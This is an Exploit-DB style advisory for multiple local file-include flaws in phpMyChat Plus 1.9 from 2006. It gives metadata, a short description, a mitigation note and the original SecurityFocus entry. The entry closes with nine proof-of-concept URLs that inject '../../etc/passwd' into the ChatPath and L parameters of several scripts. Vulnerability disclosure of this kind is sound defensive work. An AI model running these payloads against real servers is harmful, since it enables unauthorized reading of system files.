phpMyChat Multiple Local File-Include Vulnerabilities

vendor:

phpMyChat Plus

by:

SecurityFocus

7.5

CVSS

HIGH

Local File-Include Vulnerabilities

CWE

Product Name: phpMyChat Plus

Affected Version From: 1.9

Affected Version To: 1.9

Patch Exists: YES

Related CWE: N/A

CPE: a:phpmychat:phpmychat_plus

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpMyChat Multiple Local File-Include Vulnerabilities

phpMyChat is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues may allow an unauthorized user to view files and execute local scripts. phpMyChat Plus 1.9 and prior versions are vulnerable to these issues; other versions may also be affected.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20972/info

phpMyChat is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an unauthorized user to view files and execute local scripts.

phpMyChat Plus 1.9 and prior versions are vulnerable to these issues; other versions may also be affected.

http://www.example.com/path/avatar.php?ChatPath=../../etc/passwd
http://www.example.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://www.example.com/path/color_popup.php?ChatPath=../../etc/passwd
http://www.example.com/index.php?ChatPath=../../etc/passwd
http://www.example.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://www.example.com/path/avatar.php?ChatPath=../../etc/passwd
http://www.example.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://www.example.com/path/logs.php?L=../../etc/passwd
http://www.example.com/path/phpMyChat.php3?ChatPath=../../etc/passwd